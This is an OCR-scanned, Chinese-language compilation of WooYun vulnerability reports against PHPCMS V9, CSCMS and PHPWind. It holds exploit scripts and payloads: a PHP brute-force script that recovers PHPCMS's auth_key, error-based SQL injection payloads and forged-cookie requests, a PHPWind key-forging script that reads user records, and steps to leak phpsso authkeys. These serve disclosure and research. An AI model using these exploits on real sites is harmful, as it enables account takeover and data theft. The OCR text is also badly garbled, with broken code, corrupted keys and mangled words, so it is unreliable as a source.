j apache 注册 会 员 验 证 邮件 - 欢迎 您 注册 成 为 Phpcms 用 户 ， 您 的 | 
j apache 注册 会 员 验 证 邮件 - 欢迎 您 注册 成 为 phpcms 用 户 ， 您 的 
j apache 注册 会 员 验 证 邮件 - 欢迎 您 注册 成 为 phpcms 用 户 ， 您 的 
j apache 注册 会 员 验 证 邮件 - 欢迎 您 注册 成 为 Phpcms 用 户 ， 您 的 | 
j apache 注册 会 员 验 证 邮件 - 欢迎 您 注册 成 为 Phpcms 用 户 ， 您 的 
3 apache 注册 会 员 验 证 邮件 - 欢迎 您 注册 成 为 Phpcms 用 户 ， 您 的 | 
3 apache 注册 会 员 验证 邮件 - 欢迎 您 注册 成 为 phpcms 用 户 ， 您 的 | 
3 apache 注册 会 员 验证 邮件 - 1000: WAN OO un. Gg! 





欢迎 您 注册 成 为 phpcms 用 户 ， 您 的 账号 需要 邮箱 
a=registergcode 4d007)) gkBBVYBBFDAIR Ql 


www.wooyun.org 


先 来 写 一 个 小 脚本 来 碰撞 |V 
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<?php 
$url = "http://**.**,**,**/index.php?m-content&c-down&a k-f7c8BFEH( 
$reg = ‘#a_k=(.*?)\"#'; 


$code = array('7763', '2bc5', '8706', '81b7', '30a9', '49e7', '8731', ' € 


for(;;){ 
$data = doGet($url); 
preg_match_all($reg, $data, $urls); 
if (in_array(substr($urls[1][0],0,4), $code))( 
die($urls[1][0]); 
j 
$i++; 
echo $i."--".substr($urls[1][0],0,4)."\n"; 
j 
function doGet($url, $cookie=''){ 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$response = curl_exec($ch); 
curl_close($ch); 


return $response; 





简单 说 一 下 脚本 


A — ELA R A http://**.**."*.""/index.php? 
m=content&c=index&a=show&catid=19&id=51 PF 89 F £14 4€ 


code 来 自 上 一 步 的 收集 


脚本 会 不 停 请 求 页 面 并 收集 下 载 链 接 ， 当 iv 碰撞 成 功 时 停止 脚本 并 输出 原始 下 载 链 
接 


运气 不 错 ，1000 多 次 请 求 就 碰撞 成 功 了 





H — 
E3 Windows 命令 处 理 程 序 (ca | (8) mem 
1962--f2b2 





DAgDAFBVBAdUDGES: 








7763VFRVVIMAVQEJB1MGAgYFUwIPVIQDBICEB1ALCgVVRFRZVEMVXhYRD 
AgDAFBVBAdUDQESCEIKV1dXHVMPAOpTBVZKVFdUFggMCBFWXgtCRhMP 
GBsFXUAICg1SBhIADBJTCRaLBQOfEwgWDh5WTEZaE1ZaRz5EDKkhTTAU9Ym 
QiWh4eDRVADI8BVFVeVF5Q 


去 掉 前 面 的 |V 7763 卉 入 exp 中 来 计算 keyb 


<?php 


for ($i=0;$i<strlen(tkey); 
$result .= chrt 


56; -efcoel97 c6lf?T4a2Tffb3bTOdbOddefc0el 970ccb2: 
3b 7 OdbOdde "p 52cbT4a2Tffb3bTOdbÜOdde 
:\Users\Matt\Desktop 





注意 图 中 的 key 前 面 有 10 位 的 0 和 16 位 的 1 正常 流程 中 前 10 位 是 时 间 惟 后 面 16 位 是 
数据 完 ， 这 里 我 们 没 法 知道 PORE > AA CINE RK 
的 所 以 前 面 有 点 错 没 关系 。 只 要 后 面 可 以 确认 的 数据 段 足 够 长 就 能 还 原 出 正确 的 
keyd 


如 图 跑 完 后 得 到 的 数据 为 

ddefc0e197b7374b3>ge27 f56ab70db0deefc0e1970cc61F?74a27f Fb3b70dbOdde 
I a E 
按 32 位 长 度 分 段 得 到 





ddefc0e197b7374b3»2ge27f56ab70db0 
deefc0e1970cc61f?74a27ffb3b70dbO 
ddefc0e1970cc62c574a27ffb3b70dbO 
ddefc0e1970cc62c574a27ffb3b70dbO 


dde 


可 以 看 到 前 面 两 段 都 有 点 不 一 样 后 面 两 段 就 相同 了 因为 后 面 两 段 是 明确 的 明文 。 
到 这 里 已 经 拿 到 了 IV 是 7763 时 的 keyd:ddefc0e1970cc62c574a27ffb3b70db0 
我 们 来 拿 这 个 keyd 解 密 一 下 邮箱 中 的 激活 链接 试 试 

找到 7763 开 头 的 激活 链接 





欢迎 您 注册 成 为 phpcms 用 户 ， 您 的 账号 需要 邮箱 认证 ,点击 下 面 链 接 进 行 认证 : suh pibus 


器 : http: //www.phpcms. cn/index.php?m=member&c=index&a=registers 





















Ugr Wiig ABOBLIODBARWBwhWUWwOYVIYDVwgGAFoFPVIYFYVFEFaVwIRUC QpUxqgcAC “idi 


去 掉 开 头 4 位 |V 将 绿色 部 分 写 入 exp 
keyd 为 上 一 步 获 得 的 ddefc0e1970cc62c574a27ffb3b70db0 





<?php 


‘$result = chr(ord($keyd[$1 í 


成 功 解 开 了 ， 这 里 | 后 面 的 就 是 我 们 朝 思 暮 想 的 
md5(pc_base::load_config('system','auth_key')) 7 
漏洞 十 明 


拿 到 这 个 key 之 后 就 能 干 很 多 事 了 。 这 里 以 一 个 简单 的 注入 来 证 明 一 下 


/api/add_favorite.php 行 26 








$phpcms_auth = param::get cookie('auth'); 
if($phpcms_auth) ( 
$auth_key = md5(pc_base::load_config('system', 'auth_key').$_SE 
list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 
if($userid >0) { 
} else { 
exit(trim script($ GET['callback']).'('.json encode(array( 
j 
) else { 
exit(trim script($ GET['callback']).'('.json encode(array('stat 
j 
$favorite db = pc base::1oad model('favorite model'); 
$data = array('title'=>$title, ‘url'=>$url, 'adddate'-»SYS TIME, 'i 
// 根 据 ur1 判 断 是 否 已 经 收藏 过 。 
$is exists = $favorite_db->get_one(array('url'=>$url, 'userid'-»$u: 
B m — Á— -—————J———Á——— t 
userid *& Á cookie cookie 7 Ao % id 89 所 以 无 视 GPC 无 视 任 何 防御 
使 用 上 一 步 得 到 的 key 来 生成 exp 








将 生成 的 验证 串 填 入 cookie xxxx_auth 中 并 访问 


http://**.**.**.**/api.php?op=add_favorite&title=asdf&url=asdf 
页 面 直 接 返 回 错误 信息 爆 出 版 本 号 


it PHP 常见 漏洞 





$i (e D www.phpcms.cn/api.php?op- add favorite&title- asdf&url- asdf 








MySQL Query: SELECT * FROM "phpcms, cn'.'v8 favorite" WHERE ‘url’ = 'asdf AND ‘userid’ = '1' and (select 1 from (select 
information, schema.tables group by x)a);3* LIMIT 1 

MySQL Error : Duplicate entry '5.5.36-cll-lve1' for key 'group, key' 

MySQL Errno : 1062 

Message : Duplicate entry '5.5.36-cll-lve1' for key ‘group_key' 


Need Help? 
eet o —www. wooytun: org 


5 lI ue 
修复 方案 


你 们 比 我 专业 
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WooYun-2014-80370 : 程 民 舞曲 CMS 某 泄露 ， 导 
& sql A^ 

漏洞 作者 I BAK 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-080370 


简要 描述 


程 反 舞曲 CMS 某 泄 露 ， 导 致 严重 问题 


详细 说 明 
这 个 厂商 非常 给 力 ， 作 为 白 帽 子 ， 也 非常 乐意 ~ ! 
cookie 加 密 后 的 字符 泄漏 。 可 以 替换 其 他 字段 ， 导 致 SQL 等 ， 严 重 漏 洞 。 
文件 : C:\WWW\cscms_v3.5_utf8\app\controllers\open.php 
// 第 三 方 登入 入 口 
public function login() 
{ 
if (CS_Appmode==2) exit($this->CsdjSkins->Msg_url(' #2 
$urldata['log fhurl']-$ SERVER['HTTP. REFERER' ] ; / /? 
$urldata['log_state' ]=md5(unigid(rand(), TRUE)); //C: 
$this->session->set_userdata($urldata); 
$ac = $this->security->xss_clean($this->uri->segment | 


$log_url="http://**.**.**.**/denglu?ac=".$ac."&appid- 


header("Location: $log_url"); 





GET /cscms_v3.5_utf8/index.php/open/login/qq HTTP/1.1 

Host: **.**,**,** 

User-Agent: Mozilla/5.0 

Accept: text/html, application/xhtml+xm1, application/xml;q=0.9, */*;¢ 
Accept-Language: en 

Accept-Encoding: gzip,deflate 

Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7 

Keep-Alive: 115 

Connection: keep-alive 


Referer: xxoo' 


下 


1 = A ee Lo 3454 Jud 








1GET /cscms v3.5 utf8/index.php/open/login/qq HTTP/1.1 
2Host: 192.168.1.201 
SUser-Agent: Mozilla/5.0 
4 accept: text/html,application/xhtml-cxml,application/xml;q-0.9,*/*;q-0.8 
5 Accept-Language: en 
6 Accept-Encoding: gzip,deflate 
7 Accept-Charset: GB2312,utf-8;q-0.7,*;q-0.7 
BKeep-Alive: 115 
9 Connection: keep-alive 

10 Referer: xxoo' 

11 

12 





Response Headers | Response Data View Page HTML Structure Analysis 
[&] View Cookies œ Follow Redirection 


Header Name 
HTTP/1.1 302 Found 

Date Wed, 22 Oct 2014 07:25:50 GMT 

Server Apachej2.2.21 (Win32) PHP/5.3.8 

X-Powered-By 
Set-Cookie 
Set-Cookie v?xFljrzviRgaxVE2EvuCsalLSkJwNHFw; expires=W... 


1 aestian bebe tdanals hoherne carn tdanal 2-7 aao. Snnido1nn?799220.edive-k iwickkeillth? 120 


可 以 看 到 加 密 后 的 字符 : log_fhurl=-L8kxDzdqKNy9%2F2Qs0g 
利用 这 个 功能 ， 加 密 我 们 想 要 的 任意 代码 。 
替换 其 他 地 方 就 构成 注入 。 







GET /cscms v3.5 utf8/index.php/user/ulog/index/user HTTP/1.1 

Host: **,**, ** ** 

User-Agent: Mozilla/5.0 

Accept: text/html,application/xhtml-xml,application/xml;q-z0.9,*/*;« 
Accept-Language: en 

Accept-Encoding: gzip,deflate 

Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7 

Keep-Alive: 115 

Connection: keep-alive 

Referer: http://**.**,**,**/cscms v3.5 utf8/index.php/user/ 


Cookie: cs_id=L8kxDzdqkKNy9%2F2Qs0g 





1 EE E R, 1 一- 





1 GET /cscms v3.5 utf8/index.php/user/ulog/index/user HTTP/1.1 
2Host: 192.168.1.201 
3 User-Agent: Mozilla/5.0 
4 accept: text/html, application/xhtml+xml, application/xml; q=0.9,*/*;q=0.8 
5 Accept-Language: en 
6 accept-Encoding: gzip,deflate 
7 dccept-Charset: GB2312,utf-8;q-0.7,*:q-0.7 
8 Keep-Alive: 115 
日 connection: keep-alive 
但 Referer: http://192.168.1.201/cscms v3.5 utf8/index.php/user/ 
11 Cookie: cs id-L8kxDzdqKNy952F20s0g 
12 
13 





Response Headers Response Data | View Page HTML Structure Analysis 


Look for: | oo | (ai | tr 4g | E | HTML x| 


54 F«/style 
55 Fx/head» 











56 Em 

57 <div id="container"> 

58 xn1:38 ARE Z5 AK 35 AS IS Be TO sn > 

58 F <p>Error Number: IURI go see ToS have an error in your SQL syntax; check the manual that 


[corresponds to your MySQL serpe @% the right syntax to use near ''xxoo''' at line 1</p><p>PELECT 
[CS logo FROM cscms user where] cs_id='xxoo! < p><p>Filename: C:VWWWicscms v3.5 utf8\cscms\database\DB driver.p 
r«/p»«p»Line Number: 330</p> 
60 +</bhody> 

61 </html> 









1 55 Init DB cscras 

2 55 Query SET NAMES utfe 

55 Query update cscms user set cs logms-'1413963131' where cs zx-1 and cs id-'0' 
55 Query SELECT cs logo FROM cscms user where cs id-'xxoo'' 

55 Query ROLLBACK 

55 Query SET AUTOCOMMIT-1 

7 SS Oif. 


nu Pw 


1-33 

方案 1 : 加 密 过 程 加 入 字段 的 判断 ， 使 得 不 能 替换 使 用 
方案 2 : 调用 cookie 的 后 ， 在 addslashes 一 下 。 

或 者 有 其 他 办 法 ， 共 同 进 步 。 


yr 
i 


WooYun-2013-24984 : PHPCMS 最 新 版 (V9)SQL 


注入 一 村 


Y 
漏洞 作者 : blue V 
来 源 : http://www.wooyun.org/bugs/wooyun-2013-024984 


简要 描述 


比较 有 意思 的 一 个 SQL 注入 点 ， 代 码 分 析 是 个 体力 活 ， 唤 ~ 


详细 说 明 


存在 于 在 线 充值 功能 ， 直 接 上 代码 分 析 ， 建 议 先 看 漏洞 证 明 : 


/phpcms/phpcms/modules/pay/deposit.php 96 行 起 的 pay_recharge 方 法 


$trade_sn 


= param: :get_cookie('trade_sn'); // 约 110 行 位 置 ， 如 果 可 以 : 


$usernote = $ POST['info']['usernote'] ? $ POST['info' 


$surplus - array( 
'userid' 

' username ' 
'money' 
'quantity' 

' telephone' 
'contactname' 
'email' 
'addtime' 
‘ip! 


'pay type' 


-» $this-» userid, 

=> $this-» username, 

-» trim(floatval($ POST['info'][ 
-» $ POST['quantity'] ? trim(int 
=> preg_match('/[0-9\-]+/', $ PO: 
=> $ POST['info']['name'] ? trimi 
=> is email($ POST['info']['emai- 
=> SYS TIME, 

= TOL 


-» 'recharge', 


'pay id' 
"payment ' 
'ispay' 
'usernote' 


'trade sn' 


); 


=> $payment['pay. id'], 

=> trim($payment['pay_name']), 
Se ps 

-» $usernote, 


=> $trade sn, 


$recordid = $this->handle->set_record($surplus); // 直 到 


/phpcms/phpcms/modules/pay/classes/pay_deposit.class.php 12 行 起 


VASE 
* 生成 流水 记录 
* @param unknown_type 


7 


public function set_record($data) { 


$require_items = array('userid', 'username', 'email', 'contact 


if(is_array($data)) { 


foreach($data as $key=>$item) { 


if(in_array($key,$require_items)) $info[$key] = $11 


j 
) else { 


return false; 


j 


$trade exist = $this-»-account db-»get one(array('trade sn': 


if($trade exist) return $trade exist['id']; 


$this->account_db->insert($info); // 还 有 这 里 


return $this->account_db->insert_id(); 














好 了 ， 关 键 是 控制 $trade_sn 的 值 ， 看 param::get_cookie 和 param::set cookie 方法 


/phpcms/phpcms/libs/classes/param.class.php 


public static function set_cookie($var, $value = '', $time = 0 
$time = $time > 0 ? $time : ($value == '' ? SYS TIME - 360( 
$s = $ SERVER['SERVER PORT'] == '443' ? 1: 6; 


$var = pc base::1load config('system', 'cookie_pre').$var; 
$ COOKIE[$var] = $value; 
if (is array($value)) { 
foreach($value as $k=>$v) { 
setcookie($var.'['.$k.']', sys_auth($v, 'ENCODE'), 
j 
) else { 


setcookie($var, sys auth($value, 'ENCODE'), $time, pc I 


j 
j 
public static function get cookie($var, $default = '') { 
$var = pc_base::load_config('system', 'cookie_pre').$var; 
return isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DE 
j 





dTmSb auth 
dTmSb_userid cccSBwQGUIRTBAkAY 
dTmSb username ca2 1VQhUAQjslf" 
dTmSb groupid 995fBgkIUQMIAc 

dTmSb nickname alcfVQMFVgRWAe A: /WIZS a OvUBR 
dTmSb trade sn d268AQgFAVEGL BAQHV G 4 UgRQDggNWwRf 
dTmSb att json de47CAMCUIQAA1QPf p ) 









WVVWVIWVWwWiwv 


dFVsWAEAAIhOBBUAZ 


WWW.Wooyun.org 


看 来 想 自己 更 改 cookie 值 很 难 ， 不 知道 加 密 的 auth_key 值 统 ， 可 是 ... 如 果 利 用 一 个 
能 set_cookie($value) 的 点 ， 并 且 咱 们 能 控制 $value 呐 ?这 个 点 自然 是 有 的 一 


/phpcms/phpcms/modules/attachment/attachments.php 228 行 起 
public function swfupload json() { 

$arr['aid'] = intval($_GET['aid']); // 这 个 不 行 , intval 了 
$arr['src'] = trim($ GET['src']); // 这 个 可 以 ,虽然 $$_GET 会 adds1 
$arr['filename'] = urlencode($_GET['filename']); // 这 个 不 行 ， 
$json str = json_encode($arr); (此 时 \' => \\' 这 里 是 两 个 反 斜 
$att_arr_exist = param::get cookie('att json'); 
$att arr exist tmp = explode('||', $att arr exist); 


if(is array($att arr exist tmp) && in array($json str, $ati 





return true; 

) else { 
$json str = $att arr exist ? $att arr exist.'||'.$json. 
param::set cookie('att json',$json str); // 这 里 


return true; 





Hey i] HE 8H 


1.4 COOKIE att json 为 空 时 (当然 可 以 手动 清空 ) ， 访 问 以 下 链接 生成 att_json 


http://localhost/test/phpcms/index.php? 


m=attachment&c=attachments&a=swfupload_json&src=1%27&filename=a%27 
(当然 ， 你 可 以 干 点 别 的 ) 


2. 提 交 在 线 充 值 时 ， 更 改 COOKIE trade_sn 为 att_ json 的 值 


论 PHP 常见 漏洞 












(4) @ localhost/test/phpcms /index.php?m=pay&c=deposit&a= 





POST .| ‘http://localhost/test/phpcms/index.php?m=pay&c=deposit&a: 
HTTP Headers 


pay_recharge 














WESIJSSURIWUHYEINRUNINQIVNSZTEBUZA]UU£] VUAZGAUIOSG, UT NSU__USET RIS 
dTmSb, username-ca2 1VQhUAQkBUgQJUIS VUIADAFZXAIIEBIEAXVYHXhFC; 
dTmSb. groupid-995fBgklUQcHAgMBBIIKUQICAVICAgFWVQZRBQAL; 


171W","filename":"a965C9627")' LIMIT 1 
MySQL server version for the right syntax to use 












MySQL Query : SELECT * FROM 'phpcms';v9 pay account WHERE do Sn = "aid" Qesr 
MySQL Error : You have an error in your SQL syntax; check the manua a 





dTmsb nickname =a LcfVQMFVORVAACGCAQABFJVWIZSBIUDAASGUQVQVUBR; Message : aves SU Syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 
dTmSb_trade_sn=de47% UQFXBVdWDwMHBIBWBIE E E 
Z; 


dTi e oon or caer Trees ei BWBItUCgUaFgAMUUI 
Z; ECS[visit times]-6; ECS ID-61bScf6dae3e 950da4454f364d64cd06b16; 
Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 








iV Send POST Content ? 








info%5Bprice%SD=10&infoXS Bemail¥5D=admin3%40admin.com&infoXs BnameS€! 
info%5Busernote%5D=aaa&code=vcbd&dosubmit=%E7%A LMAE «3ESXAEX9A&pa 


www.wooyun. org 


eoo Mozilla Firefox 
http://v9.demo...a-pay recharge * 3 





(4) @ v9.demo.phpcms.cn/index.php?m=pay&c=deposit&a=pay_recharge 





MySQL Query : SELECT * FROM 'v9 demo phpcms cn'.'v9 pay account WHERE "trade sn' = ‘{"aid":0,"sre":"1\\","filename":"a%5C%27°} LIMIT 1 


MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘filename™:"a%5C%27"}' LIMIT 1' at line 1 
MySQL Errno : 1064 


Message : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'filename";"a965C9627") LIMIT 1' at line 1 
Need Help? 





demo 站 的 程序 应 该 是 最 新 的 吧 ? 


www.wooyun.org 
A > 
修复 方案 


对 $trade_sn 进 行 addslashes 
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WooYun-2014-72727 : 一 个 PHPWIND 可 拿 shell 
的 高 危 漏洞 

漏洞 作者 : Map 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-072727 


简要 描述 


如 题 。 


详细 说 明 
没 想到 PHPWIND 犯 了 一 个 和 PHPCMS 一 样 的 漏洞 。 
在 src/applications/windidserver/api/controller/AppController.php 内 代码 : 
public function listAction() { 
$result = $this->_getAppDs()->getList(); 


$this->output($result); 


如 何 获 取 可 以 访问 接口 的 key? 

查看 用 户 上 传 头 像 页 面 就 可 以 知道 了 : 
/phpwind/src/windid/service/user/srv/WindidUserService.php 
内 的 代码 : 


$key = WindidUtility: :appKey($appId, $time, $appKey, array('uid'-»: 





去 头像 页 面 查看 一 下 源 文 件 


http://localhost/phpwind/index.php?m=profile&c=avatar&_left=avatar 


论 PHP 常见 漏洞 


<param name- "allowScriptAccess" value- never /> 

<param name="FlashVars” value="postAction=ra_postActionkredirectURL=/ tURL=h 52 

did*2Findex. phpX3Fak3Dapik26ck3Davatar’k2GakSDdokvatar’26uids3D1406windidkeyX3D: LRE BB) ll rE Ot imeh3D14081¢ 
tp%3A%2F%2Flocalhost%2Fphpwind%2Fwindid%2Fattachment%2Favatar%2f000%2F00%2F00%2F1. jpg%3Fr%3D88418” /> 
<embed src="http://localhost/phpwind/windid/res/swf/avatar/avatar. swf?1558 quality= high bgcolor= #ffffff” width="700" h 
le" allowScriptAccess- never" allowFullScreen= false" scale="exactfit” wmode="transparent” FlashVars="postAction=ra_po 
p%3A%2F 

did%2F index. php*3Fm*$3Dapi*26c*3Davatar$26a*3DdoAvatar*26uid*3D19*26windidkey*3Df5b35f56c88695b9069e18ecaafad8749*26t ime%3D1408 15 
tph3A%2F%2F localhost%2Fphpwind%2Fwindids2Fattachment%2Favatarh2F000%2F00%2FO0K2F 1. jpg$3Fr*3D88418" type="application/x-shockw 
sromedia. com/go/getflashplayer” /> 

iject> <div class=“other_upload“> 如 果 无 法 上 传 头 像 ， 请 党 试 使 用 Ca href-"http://localhost/phpw 
r&type=nomal” ;普通 上 传 模式 《/a>《/div> 











解 出 urldecode 得 : 


http://localhost/phpwind/windid/index.php? 
m=api&c=avatar&a=doAvatar&uid=1&windidkey=f5b35f56c88695b9069e18ecaaf 
ad874&time=1408197299&clientid=1&type=flash&avatar=http://localhost/phpwind/ 
windid/attachment/avatar/000/00/00/1.jpg?r=88418 


Ad 


&avatar-http://localhost/phpwind/windid/attachment/avatar/000/00/00/1 jpg? 
r-88418 


然后 记得 ， 还 需要 POST 一 个 uid 等 于 undefined 
把 doAvatar 换 成 list,avatar 换 成 app 得 : 


http://localhost/phpwind/windid/index.php? 
m=api&c=app&a=list&uid=1&windidkey=f5b35f56c88695b9069e18ecaafad874&ti 
me=1408197299&clientid=1&type=flash 


POST : uid=undefined 

得 : 

{"1": ", 

"id":"1","name":"phpwind9.0","siteurl":"http:VVlocalhost\Vphpwind","siteip":"", "secre 


tkey":"73e3dcdd733c7c3733c17273a624e162","apifile":"windid.php","charset":"gb 
k","issyn":"1 ","isnotify":"1 分 





























€ | @ localhost/phpwind/windid/index.php?m=api&c=app&a=list&iuid=1 &windidkey-f5b35156c88695b9069e18ecaafad874&time-1408197299&cli. Y Œ | | 图 - Google P ko Pe: 
[INT ¥] = € SQL XSS- Encryption- Encoding- Other 
司 load URL  http;//localhost/phpwind/windid/index php?m-api&c-app&a-list&uid-- 1 Swindidkey=f5b35f56c88695b9069e1 Secaatad874autime=1408197299@clientid=1 &type-flash 
Q Split URL 
D Execute 
V] Enable Post data Enable Referrer 
Post data | uid=undefined 





{"1": {"id":"1", "name" :^ i *  "siteurl":^| localhost 
\/phpwind”, "siteip":"^, |secretkey" :"73e3dcdd733c7c3733c17273a624e162", “apifile”:”windid. php”, “charset” :”gbk”, “issyn”:"1", "isnotify :"17]) 











拿 到 这 个 key， 我 可 以 做 的 事情 太 多 了 ， 用 户 体 系 内 的 所 有 事情 我 都 可 以 做 了 。 


漏洞 证 明 


WooYun-2014-72727 : 一 个 PHPWIND 可 拿 shell 的 高 危 漏 洞 356 


€ @localhost/; 8 uic 5f5 95l 1874 8xt 4 72998 2 | | 图 - Google P *86 & ff 1 
INT v e 6 SQL- XSS- Encryption- Encoding- Other- 
@ LoadURL |http;//localhost/phpwind/windid/index.php?mzapi&c-app&a-list&uid-18windidkey-f5b35f56c88695b9069e18ecaafad874&time  1408197299&clientid - 1 &type flash 





Q Split URL 
») Execute 
[V] Enable Post data [DD] Enable Referrer 
Post data uid=undefined 
("1":{"id":"1", "name" :”phpwind9. 0", "siteurl":"http: V/V/localhost 
\/phpwind”, “siteip”:””, |secretkey” :”73e3dcedd733c7c3733c17273a624e162”, “apifile”:”windid. php", “charset”:”gbk”, "issyn : 1^, "isnotify :^1^]] 








拿 到 这 个 key， 我 可 以 做 的 事情 太 多 了 ， 用 户 体系 内 的 所 有 事情 我 都 可 以 做 了 。 
在 官网 测试 了 一 下 ， 拿 到 key 后 测试 一 下 读 取 一 个 用 户 的 资料 : 


<?php 

$secretkey = '308c6c43a*****279dd61dd80e8d59bd' ; 
$e = “user; 

$a = Get = 


$data = array('uid'=>'658925'); 


$time = time(); 
$key = appKey('1', time(), $secretkey, array('userid'=>658925), $d: 
echo post('http://**.**.**.**/windid/index.php?m=api&c='.$c.'&a='.s 
function post($uri,$data) { 

$ch = curl init (); 

curl_setopt ( $ch, CURLOPT_URL, $uri ); 

curl_setopt ( $ch, CURLOPT_POST, 1 ); 

curl_setopt ( $ch, CURLOPT HEADER, O0 ); 

curl setopt ( $ch, CURLOPT RETURNTRANSFER, 1 ); 

curl setopt ( $ch, CURLOPT POSTFIELDS, $data ); 

$return - curl exec ( $ch ); 

curl close ( $ch ); 

return $return; 


j 


function appKey($apild, $time, $secretkey, $get, $post) { 


$array = array('m', 'c', 'a', 'windidkey', 'clientid', 'time', 

So c 

ksort($get); 

ksort($post); 

foreach ($get AS $k=>$v) { 
if (in_array($k, $array)) continue; 
$str .=$k.$v; 

j 

foreach ($post AS $k=>$v) { 
if (in_array($k, $array)) continue; 
$str .=$k.$v; 

j 


return md5(md5(S$apild.'||'.$secretkey).$time.$str); 





localhost:logs Leann$ php /Users/Leann/Downloads/z.php p 
{"uid" :"658925" , "username" :"phpwind","email":"fengyuGgphpwind.net","safecv":"5b4111de","regdate":"1143101940","regip":"")localhost:logs Leann$ f 


{"uid":"658925","username":"phpwind","email":"fengyu@...","safecv":"5b4111de","r 
egdate":"1143101940","regip":""} 


在 User 的 api 内 还 有 一 个 edit 的 接口 ， 可 以 修改 任意 用 户 的 密码 ， 调 用 它 ， 不 填写 
old_password， 将 可 以 修改 任意 用 户 的 密码 ， 不 会 验证 原 密码 的 。 


修复 方案 


不 要 轻信 key， 可 以 将 m，a，c 都 加 入 key 的 运算 。 


WooYun-2014-66394 : PHPCMS V9 一 个 为 所 欲 
^ 6 Eo 


漏洞 作者 : Map 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-066394 


简要 描述 
不 知道 怎么 形容 这 个 漏洞 ， 反 正大 部 分 情况 下 可 以 做 的 事情 很 多 了 。 


官网 注册 不 上 ， 所 以 无 法 官网 演示 。 


详细 说 明 
安装 phpcms 的 时 候 会 强制 安装 它 的 通行 证 。 
phpcms/phpsso_server/phpcms/modules/phpsso/index.php 里 有 一 段 很 可 怕 的 代码 
Je * 
* 获取 应 用 列表 
ay, 
public function getapplist() { 
$applist = getcache('applist', 'admin'); 


exit(serialize($applist)); 


cache 里 是 什么 内 容 呢 ， 我 们 自己 去 看 一 下 文件 : 


<?php 
return array ( 
Js 
array ( 
'appid' => '1', 
'type' => 'phpcms v9', 
'name' => 'phpcms v9', 
'url' => 'http://localhost:8038/study/phpcms/', 
'authkey' => 'L7UXO1CpUV6QmkXO0eGAXiOdQy6Hmvkr', 
Hp 
'apifilename' => 'api.php?op=phpsso', 
'charset' => 'gbk', 


'synlogin' => '1', 


所 以 只 要 我 们 调用 phpsso 并 且 能 走 到 这 个 方法 里 ， 就 会 突出 Sso 配 置 的 客户 端的 所 
有 信息 ， 包 括 authkey 。 


查看 通行 证 代码 发 现 ， 只 要 $ POST['data'] 可 以 解 出 来 ， 就 可 以 走 下 去 。 
if(isset($ GET) && is_array($ GET) && count($ GET) > 0) { 
foreach($ GET as $k=>$v) { 
if(!in array($k, array('m','c','a'))) { 


$_POST[$k] = $v; 


GET 全 付 给 POST 


if(isset($ POST['data'])) { 
parse str(sys auth($ POST['data'], 'DECODE', $this-»ap[ 
if(empty($this->data) || !is_array($this->data)) { 
exit('0'); 
} 
} else { 
exit('0'); 
} 
ie] LH 
Ook， 我 们 怎么 拿 到 这 个 $_POST['data'] ， 用 户 上 传 头 像 的 页 面 里 就 有 。 
注册 登录 后 访问 





http://localhost:8038/study/phpcms/index.php? 
m=member&c=index&a=account_manage_avatar&t=1 


查看 源 文件 : 


iwi) HMM EMT METTUS 
var flashvars - 
* upurl’ :"aHROcDovL2xvY2F saG9zdDo4NDI 4LSNOdWRb5LSBocGNt cy 9waHBzc29fc2VydmVyL21uZ6V4LnBocD9tPXBocHNzbyZ jPWluZGV: 





var params = Í 
"align :’ middle’, 
; a s P 
play : true , 
' loop’ :' false’, 
' scale’ :' showall', 
s rea a ; 
wmode : window , 
www.wooyun.org 


拿 到 这 个 : 


aHROcDovL2xvY2FsaG9zdDo4MDM4L3N0dWR5L3BocGNtcy9waHBzc29fc2Vyd 
mVyL2luZGV4LnBocD9tPXBocHNzbyZjPWluZGV4JmE9dXBsb2FkYXZhdGFyJm 
F1dGhfZGFOYT 12PTEmYXBwaWQ9MSZkYXRhHPWU1YZJWQU1HVVFaUkFRa0 
IVUVFLVnaGVUFnSUNWZOFJQWXKkVKkJRRKREUVZjVjBNVVFHaOFReFZaWmx 
NRUdBOSUyQKkRqWm9LMUFIUm1Vd0JHYO9YVzVVRGdRaEpEeGFIUVZuROFKk 
eFZSYOtRQQ-- 


解除 base64_decode 编 码 得 


http://localhost:8038/study/phpcms/phpsso_server/index.php? 
m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=e5c2VAMG 
UQZRAQKIUQQKVwFUAgICVgAIAIdDVBQFDDQVcVOMUQGkKAQxVZZIMEGA9% 
2BDjZoK1AHRmMUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA 


将 url 里 的 uploadavatar 换 成 : getapplist 得 : 


http://localhost:8038/study/phpcms/phpsso_server/index.php? 
m=phpsso&c=index&a=getapplist&auth_data=v=1 &appid=1&data=e5c2VAMGUQ 
ZRAQkKIUQQKVWFUAgICVgAIAlIdVBQFDDQVcVOMUQGkAQxVZZIMEGA9%2BD 
jZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA 


访问 得 : 
a:1:{i:1;a:9:{s:5:"appid";s:1:"1"5s:4:"type";s:9:"phpcms_v9";s:4:"name";s:9:"phpcms 
v9":s:3:"url";s:35;"http://localhost:8038/study/phpcms/";s:7:"authkey";s:32;"L7UXO 


1cpUVeQmkX0oeGAXiOdQy6Hmwvkr";s:2:"ip";s:0:"s:11:"apifilename";s:17:"api.p 
hp?op=phpsso";s:7:"charset";s:3:"gbk",s:8:"synlogin";s:1:"1";}} 


和 我 们 想 的 一 样 ，authkey 在 里 面 : 
s:7:"authkey";s:32:"L7UXO1cpUV6QmkX0oeGAXiOdQy6Hmvkr" 
拿 到 这 个 key 已 经 可 以 想 做 什么 想 什么 了 ，sso 体 系 里 的 东西 都 可 以 做 了 。 


解密 出 来 的 东西 不 受 控 制 ， 可 以 包含 null 截 断 ， 也 可 以 包含 单 双 引 号 


举 个 例子 : 
